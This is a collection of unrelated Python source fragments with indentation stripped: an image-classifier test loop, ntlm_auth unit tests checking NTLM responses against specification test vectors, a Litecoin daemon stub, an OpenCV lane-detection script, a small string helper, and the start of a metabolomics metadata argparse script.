load_checkpoint(self.checkpoint_path, self.model, self.device)
def build_meter(self):
if self.cfg.data.name != "folder":
self.num_classes = self.test_loader.num_classes
self.evaluator = MultiClassEvaluator(
num_classes=self.num_classes
)
self.batch_time_meter = AverageMeter()
logger.info("Meters initialized")
def reset_meter(self):
if self.cfg.data.name != "folder":
self.evaluator.reset()
self.batch_time_meter.reset()
def log_iter_info(self, iter, max_iter):
log_dict = {}
log_dict["batch_time"] = self.batch_time_meter.val
if self.cfg.data.name != "folder":
log_dict.update(self.evaluator.curr_score())
logger.info(
"Test iter[{}/{}]\t{}".format(
iter + 1, max_iter, json.dumps(round_dict(log_dict))
)
)
def log_epoch_info(self):
log_dict = {}
if self.cfg.data.name != "folder":
log_dict["samples"] = self.evaluator.num_samples()
metric, table_data = self.evaluator.mean_score(print=False)
log_dict.update(metric)
logger.info("\n" + AsciiTable(table_data).table)
logger.info("Test Epoch\t{}".format(
json.dumps(round_dict(log_dict))
))
if self.cfg.wandb.enable:
wandb_log_dict = dict(
("Test/{}".format(key), value) for (key, value) in log_dict.items()
)
wandb_log_dict["Test/score_table"] = wandb.Table(
columns=table_data[0], data=table_data[1:]
)
wandb_log_dict["Test/conf_mat"] = wandb.sklearn.plot_confusion_matrix(
self.evaluator.labels,
self.evaluator.pred_labels,
self.evaluator.classes,
)
wandb.log(wandb_log_dict)
@torch.no_grad()
def test(self):
self.reset_meter()
self.model.eval()
max_iter = len(self.test_loader)
end = time.time()
if self.cfg.test.save_prediction:
fsave = open(osp.join(self.work_dir, "predicts.csv"), "w")
for i, samples in enumerate(self.test_loader):
# import ipdb; ipdb.set_trace()
# img = ta.preprocess(samples[0])
img = samples[0]
inputs = ta.augment(
img,
self.cfg.test.augment
)
if isinstance(inputs, list):
outputs = [
self.model(torch.from_numpy(x).to(self.device)) for x in inputs
]
outputs = torch.cat(outputs, dim=0)
else:
inputs = torch.from_numpy(inputs).to(self.device)
outputs = self.model(inputs)
label = samples[1]
predicts = F.softmax(outputs, dim=1)
predicts = ta.fuse_predicts(predicts, reduce=self.cfg.test.augment.fuse)
pred_label = torch.argmax(predicts)
if self.cfg.data.name != "folder":
self.evaluator.update(
np.expand_dims(predicts.detach().cpu().numpy(), axis=0),
np.expand_dims(label, axis=0),
)
if self.cfg.test.save_prediction:
fsave.write("{},{},{:.5f},{:.5f},{:.5f},{:.5f},{:.5f},{:.5f}\n".format(
osp.splitext(samples[2])[0],
pred_label,
predicts.max(),
predicts[0], predicts[1], predicts[2], predicts[3], predicts[4],
))
# measure elapsed time
self.batch_time_meter.update(time.time() - end)
# logging
if (i + 1) % self.cfg.log_period == 0:
self.log_iter_info(i, max_iter)
end = time.time()
self.log_epoch_info()
if self.cfg.test.save_prediction:
fsave.close()
|
import struct
import time
from ntlm_auth.compute_response import ComputeResponse, get_windows_timestamp
from ntlm_auth.constants import AvId, AvFlags
from ntlm_auth.messages import ChallengeMessage, TargetInfo
class TestGeneric(object):
def test_get_timestamp_format(self):
actual1 = struct.unpack("<q", get_windows_timestamp())[0]
time.sleep(1)
actual2 = struct.unpack("<q", get_windows_timestamp())[0]
assert actual2 > actual1
class TestHashResults(object):
def test_get_LMv1_response(self):
# 4.2.2.2.2 - LMv1 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
expected = b"\x98\xde\xf7\xb8\x7f\x88\xaa\x5d" \
b"\xaf\xe2\xdf\x77\x96\x88\xa1\x72" \
b"\xde\xf1\x1c\x7d\x5c\xcd\xef\x13"
actual = ComputeResponse._get_LMv1_response("Password",
server_challenge)
assert actual == expected
def test_get_LMv2_response(self):
# 4.2.4.2.1 - LMv2 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
client_challenge = b"\xaa" * 8
expected = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
actual = ComputeResponse._get_LMv2_response("User", "Password",
"Domain", server_challenge,
client_challenge)
assert actual == expected
def test_get_NTLMv1_response(self):
# 4.2.2.2.1 - NTLMv1 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
expected_response = b"\x67\xc4\x30\x11\xf3\x02\x98\xa2" \
b"\xad\x35\xec\xe6\x4f\x16\x33\x1c" \
b"\x44\xbd\xbe\xd9\x27\x84\x1f\x94"
expected_key = b"\xd8\x72\x62\xb0\xcd\xe4\xb1\xcb" \
b"\x74\x99\xbe\xcc\xcd\xf1\x07\x84"
actual_response, actual_key = \
ComputeResponse._get_NTLMv1_response("Password", server_challenge)
assert actual_response == expected_response
assert actual_key == expected_key
def test_get_NTLM2_response(self):
# 4.2.3.2.2 - NTLMv1 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
client_challenge = b"\xaa" * 8
expected_response = b"\x75\x37\xf8\x03\xae\x36\x71\x28" \
b"\xca\x45\x82\x04\xbd\xe7\xca\xf8" \
b"\x1e\x97\xed\x26\x83\x26\x72\x32"
expected_key = b"\xd8\x72\x62\xb0\xcd\xe4\xb1\xcb" \
b"\x74\x99\xbe\xcc\xcd\xf1\x07\x84"
actual_response, actual_key = \
ComputeResponse._get_NTLM2_response("Password", server_challenge,
client_challenge)
assert actual_response == expected_response
assert actual_key == expected_key
def test_nt_v2_temp_response(self):
# 4.2.4.1.3 - temp
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
expected = b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
actual = ComputeResponse._get_NTLMv2_temp(b"\x00" * 8, b"\xaa" * 8,
test_target_info)
assert actual == expected
def test_get_NTLMv2_response(self):
# 4.2.4.2.2 - NTLMv2 Response
server_challenge = b"\x01\x23\x45\x67\x89\xab\xcd\xef"
client_challenge = b"\xaa" * 8
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
expected_response = b"\x68\xcd\x0a\xb8\x51\xe5\x1c\x96" \
b"\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
expected_key = b"\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82" \
b"\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3"
actual_response, actual_key = \
ComputeResponse._get_NTLMv2_response("User", "Password", "Domain",
server_challenge,
client_challenge, b"\x00" * 8,
test_target_info)
assert actual_response == expected_response
assert actual_key == expected_key
class TestChallengeResults(object):
def test_lm_v1_response(self):
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x02\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
expected = b"\x98\xde\xf7\xb8\x7f\x88\xaa\x5d" \
b"\xaf\xe2\xdf\x77\x96\x88\xa1\x72" \
b"\xde\xf1\x1c\x7d\x5c\xcd\xef\x13"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
1).get_lm_challenge_response()
assert actual == expected
def test_lm_v1_with_extended_security_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x0a\x82"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
expected = b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
1).get_lm_challenge_response()
assert actual == expected
def test_lm_v1_with_ntlm_2_response(self):
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x02\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
        # Not explicitly shown in the MS-NLMP example, but the expected
        # response is the same one that is already set above
expected = b"\x67\xc4\x30\x11\xf3\x02\x98\xa2" \
b"\xad\x35\xec\xe6\x4f\x16\x33\x1c" \
b"\x44\xbd\xbe\xd9\x27\x84\x1f\x94"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
2).get_lm_challenge_response()
assert actual == expected
def test_lm_v2_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
expected = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
3).get_lm_challenge_response()
assert actual == expected
def test_lm_v2_response_with_no_target_info_timestamp(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
expected = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
3).get_lm_challenge_response()
assert actual == expected
def test_lm_v2_response_with_server_target_info_timestamp(self):
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_target_info[AvId.MSV_AV_TIMESTAMP] = b"\x00" * 8
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
# Not in MS-NLMP, using expected value
expected = b"\x00" * 24
actual = ComputeResponse("User", "Password", "Domain",
test_challenge_message,
3).get_lm_challenge_response()
assert actual == expected
def test_nt_v1_response(self):
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x02\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
test_lmv1_response = b"\x98\xde\xf7\xb8\x7f\x88\xaa\x5d" \
b"\xaf\xe2\xdf\x77\x96\x88\xa1\x72" \
b"\xde\xf1\x1c\x7d\x5c\xcd\xef\x13"
expected_response = b"\x67\xc4\x30\x11\xf3\x02\x98\xa2" \
b"\xad\x35\xec\xe6\x4f\x16\x33\x1c" \
b"\x44\xbd\xbe\xd9\x27\x84\x1f\x94"
expected_exchange_key = b"\xd8\x72\x62\xb0\xcd\xe4\xb1\xcb" \
b"\x74\x99\xbe\xcc\xcd\xf1\x07\x84"
expected_target_info = None
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 1)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv1_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
def test_nt_v1_with_extended_security_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x0c\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x0a\x82"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00"
)
test_lmv1_response = b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
expected_response = b"\x75\x37\xf8\x03\xae\x36\x71\x28" \
b"\xca\x45\x82\x04\xbd\xe7\xca\xf8" \
b"\x1e\x97\xed\x26\x83\x26\x72\x32"
expected_exchange_key = b"\xeb\x93\x42\x9a\x8b\xd9\x52\xf8" \
b"\xb8\x9c\x55\xb8\x7f\x47\x5e\xdc"
expected_target_info = None
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 1)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv1_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
def test_nt_v2_response(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
test_lmv2_response = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
expected_response = b"\x68\xcd\x0a\xb8\x51\xe5\x1c\x96" \
b"\xaa\xbc\x92\x7b\xeb\xef\x6a\x1c" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
expected_exchange_key = b"\x8d\xe4\x0c\xca\xdb\xc1\x4a\x82" \
b"\xf1\x5c\xb0\xad\x0d\xe9\x5c\xa3"
expected_target_info = test_target_info
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 3)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv2_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
    # The following tests differ from the Microsoft examples; MS-NLMP does not
    # cover these scenarios, so the expected values were made up for this suite
def test_nt_v2_response_no_target_info(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
monkeypatch.setattr('ntlm_auth.compute_response.get_windows_timestamp',
lambda: b"\x00" * 8)
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = None
test_lmv2_response = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
expected_response = b"\x39\x56\xf2\xe5\x69\xd9\xaf\xa3" \
b"\xac\x2d\x4f\x36\x7d\x38\xb9\xc5" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00"
expected_exchange_key = b"\xe3\x35\x1f\x5b\xe0\xa0\x2b\xc2" \
b"\xee\xb8\x76\x52\xf7\xe0\x77\x75"
expected_target_info = TargetInfo()
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 3)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv2_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info.pack() == expected_target_info.pack()
def test_nt_v2_response_with_timestamp_av_pair(self, monkeypatch):
monkeypatch.setattr('os.urandom', lambda s: b"\xaa" * 8)
test_target_info = TargetInfo()
test_target_info[AvId.MSV_AV_NB_DOMAIN_NAME] = \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00\x69\x00\x6e\x00"
test_target_info[AvId.MSV_AV_NB_COMPUTER_NAME] = \
b"\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00"
test_target_info[AvId.MSV_AV_TIMESTAMP] = b"\x00" * 8
test_challenge_message = ChallengeMessage(
b"\x4e\x54\x4c\x4d\x53\x53\x50\x00"
b"\x02\x00\x00\x00\x03\x00\x0c\x00"
b"\x38\x00\x00\x00\x33\x82\x8a\xe2"
b"\x01\x23\x45\x67\x89\xab\xcd\xef"
b"\x00\x00\x00\x00\x00\x00\x00\x00"
b"\x24\x00\x24\x00\x44\x00\x00\x00"
b"\x06\x00\x70\x17\x00\x00\x00\x0f"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x02\x00\x0c\x00"
b"\x44\x00\x6f\x00\x6d\x00\x61\x00"
b"\x69\x00\x6e\x00\x01\x00\x0c\x00"
b"\x53\x00\x65\x00\x72\x00\x76\x00"
b"\x65\x00\x72\x00\x00\x00\x00\x00"
)
test_challenge_message.target_info = test_target_info
test_lmv2_response = b"\x86\xc3\x50\x97\xac\x9c\xec\x10" \
b"\x25\x54\x76\x4a\x57\xcc\xcc\x19" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
expected_response = b"\x5d\xeb\xf3\x87\x1c\x28\x94\xb8" \
b"\x1f\x16\x42\x81\xed\xbf\x0b\xff" \
b"\x01\x01\x00\x00\x00\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa" \
b"\x00\x00\x00\x00\x02\x00\x0c\x00" \
b"\x44\x00\x6f\x00\x6d\x00\x61\x00" \
b"\x69\x00\x6e\x00\x01\x00\x0c\x00" \
b"\x53\x00\x65\x00\x72\x00\x76\x00" \
b"\x65\x00\x72\x00\x07\x00\x08\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00" \
b"\x06\x00\x04\x00\x02\x00\x00\x00" \
b"\x00\x00\x00\x00\x00\x00\x00\x00"
expected_exchange_key = b"\x9b\x37\x06\x8f\x99\x7a\x06\x5f" \
b"\xe9\xc7\x20\x63\x32\x88\xd4\x8f"
expected_target_info = test_target_info
expected_target_info[AvId.MSV_AV_FLAGS] = \
struct.pack("<L", AvFlags.MIC_PROVIDED)
comp_response = ComputeResponse("User", "Password", "Domain",
test_challenge_message, 3)
actual_response, actual_exchange_key, actual_target_info = \
comp_response.get_nt_challenge_response(test_lmv2_response, None)
assert actual_response == expected_response
assert actual_exchange_key == expected_exchange_key
assert actual_target_info == expected_target_info
|
from btc import BTCDaemon
class LTCDaemon(BTCDaemon):
name = "LTC"
DEFAULT_PORT = 5001
def load_electrum(self):
import electrum_ltc
self.electrum = electrum_ltc
if __name__ == "__main__":
daemon = LTCDaemon()
daemon.start()
|
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import cv2
# Read in and grayscale the image
image = mpimg.imread('exit-ramp.jpg')
plt.imshow(image)
plt.show()
gray = cv2.cvtColor(image,cv2.COLOR_RGB2GRAY)
plt.imshow(gray)
plt.show()
# Define a kernel size and apply Gaussian smoothing
kernel_size = 5
blur_gray = cv2.GaussianBlur(gray,(kernel_size, kernel_size),0)
plt.imshow(blur_gray)
plt.show()
# Define our parameters for Canny and apply
low_threshold = 50
high_threshold = 150
edges = cv2.Canny(blur_gray, low_threshold, high_threshold)
plt.imshow(edges)
plt.show()
# Next we'll create a masked edges image using cv2.fillPoly()
mask = np.zeros_like(edges)
ignore_mask_color = 255
# This time we are defining a four sided polygon to mask
imshape = image.shape
vertices = np.array([[(50,imshape[0]),(420, 300), (520, 300), (900,imshape[0])]], dtype=np.int32)
cv2.fillPoly(mask, vertices, ignore_mask_color)
masked_edges = cv2.bitwise_and(edges, mask)
plt.imshow(masked_edges)
plt.show()
# Define the Hough transform parameters
# Make a blank the same size as our image to draw on
rho = 1 # distance resolution in pixels of the Hough grid
theta = np.pi/180 # angular resolution in radians of the Hough grid
threshold = 2 # minimum number of votes (intersections in Hough grid cell)
min_line_length = 4 #minimum number of pixels making up a line
max_line_gap = 5 # maximum gap in pixels between connectable line segments
line_image = np.copy(image)*0 # creating a blank to draw lines on
# Run Hough on edge detected image
# Output "lines" is an array containing endpoints of detected line segments
lines = cv2.HoughLinesP(masked_edges, rho, theta, threshold, np.array([]),
min_line_length, max_line_gap)
# Iterate over the output "lines" and draw lines on a blank image
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(line_image,(x1,y1),(x2,y2),(255,0,0),10)
# Create a "color" binary image to combine with line image
color_edges = np.dstack((edges, edges, edges))
plt.imshow(color_edges)
plt.show()
# Draw the lines on the edge image
lines_edges = cv2.addWeighted(color_edges, 0.8, line_image, 1, 0)
plt.imshow(lines_edges)
plt.show()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
__all__ = [
'csl',
]
def csl(l):
return ', '.join(str(x) for x in l)
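# Illustrative usage (not part of the original module); the outputs follow
# directly from the join above.
if __name__ == '__main__':
    print(csl([1, 2, 3]))          # 1, 2, 3
    print(csl(['GET', 'POST']))    # GET, POST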
|
#!/usr/bin/env python
import sys
import json
import os
import argparse
import textwrap
import csv
import inspect
def ontology_lookup(name, table):
    # takes an ontology accession number and returns the corresponding name
filename = inspect.getframeinfo(inspect.currentframe()).filename
path = os.path.dirname(os.path.abspath(filename))
# check if correct table
if table=="role":
tablepth = os.path.join(path, 'pub_role.loc')
elif table=="status":
tablepth = os.path.join(path, 'pub_status.loc')
else:
print "Table not recognised"
return ""
with open(tablepth, "rb") as csvfile:
reader = csv.reader(csvfile, delimiter='\t')
ont_dict = dict((k, v) for v, k in reader)
try:
return ont_dict[name]
except KeyError:
return ""
def main():
p = argparse.ArgumentParser(prog='PROG',
formatter_class=argparse.RawDescriptionHelpFormatter,
description='''DI-MS processing for DMA''',
epilog=textwrap.dedent('''\
-------------------------------------------------------------------------
'''))
p.add_argument('-inputzip', dest='inputzip', required=True)
p.add_argument('-out_dir', dest='out_dir', required=True)
p.add_argument('-html_file', dest='html_file', required=True)
p.add_argument('-study_title', dest='study_title', required=True)
p.add_argument('-jsontxt', dest='jsontxt', required=False, nargs='?')
p.add_argument('--s_submission_date', dest='s_submission_date', required=False, default="", nargs='?')
p.add_argument('--s_release_date', dest='s_release_date', required=False, default="", nargs='?')
p.add_argument('--s_description', dest='s_description', required=False, default="", nargs='?')
p.add_argument('--s_pubmed', dest='s_pubmed', required=False, default="", nargs='?')
p.add_argument('--s_pub_doi', dest='s_pub_doi', required=False, default="", nargs='?')
p.add_argument('--s_pub_status', dest='s_pub_status', required=False, default="", nargs='?')
p.add_argument('--s_pub_author', dest='s_pub_author', required=False, default="", nargs='?')
p.add_argument('--s_pub_title', dest='s_pub_title', required=False, default="", nargs='?')
p.add_argument('--s_first_name', dest='s_first_name', required=False, default="", nargs='?')
p.add_argument('--s_mid_initials', dest='s_mid_initials', required=False, default="", nargs='?')
